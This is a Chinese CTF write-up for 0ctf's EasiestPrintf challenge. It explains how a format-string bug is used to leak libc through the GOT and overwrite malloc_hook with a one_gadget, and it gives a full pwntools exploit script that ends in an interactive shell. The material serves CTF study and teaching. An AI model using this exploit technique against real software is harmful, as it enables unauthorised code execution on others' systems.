zoukankan      html  css  js  c++  java
  • 格式化字符串漏洞利用实战之 0ctf-easyprintf

    前言

    这是 0ctf 的一道比较简单的格式化串的题目。

    正文

    逻辑非常简单

    do_read 可以打印内存地址的数据,可用来 泄露 got.

    leave 格式化字符串漏洞。

    printf(s) 直接调用 exit 退出了。不过可以使用 %1000c 触发 printf 里面的 mallocfree, 所以思路很清楚了,修改 free_hook 或者 malloc_hookone_gadget, 并且在格式化串末尾加上 %1000c触发 mallocfree

    最后

    最开始修改 free_hook, 发现所有的 one_gadget 都不能用,后面使用了 malloc_hook ,终于找到一个可以用的,估计和寄存器的数据有关。

    exp:

    from pwn import *
    context(os='linux',log_level='debug')
    
    
    p = process("./EasiestPrintf")
    
    # gdb.attach(p, '''
    
    # c
    
    # 	''')
    
    setvbuf_got = 0x08049FF0 
    exit_got = 0x08049FE4
    
    pause()
    p.sendline(str(setvbuf_got))
    p.recvuntil("Which address you wanna read:
    ")
    setvbuf_addr = int(p.recv(len('0xf7e60360')), 16)
    libc_addr = setvbuf_addr - 0x60360
    free_hook = libc_addr + 0x1b38b0
    malloc_hook = libc_addr + 0x1b2768
    one_gadget = libc_addr + 0x3ac69
    log.info("free_hook: " + hex(free_hook))
    log.info("one_gadget: " + hex(one_gadget))
    pause()
    
    payload = fmtstr_payload(7, {malloc_hook: one_gadget})  
    payload +=  "%100000c"
    
    p.sendline(payload)
    p.interactive()
    
    
  • 相关阅读:
    SQL中的聚合函数
    vs移动团队项目集合
    网页变量的赋值示例
    PRD、MRD、BRD的含义
    w3cschool中jQuery测试结果总结
    sql队伍的胜负情况
    winform中获取当前周次
    select2 的使用
    layui layer table 常见问题
    spring websocket tomcat was websphere9.0 Multiple Endpoints may not be deployed to the same path
  • 原文地址:https://www.cnblogs.com/hac425/p/9416818.html
Copyright © 2011-2022 走看看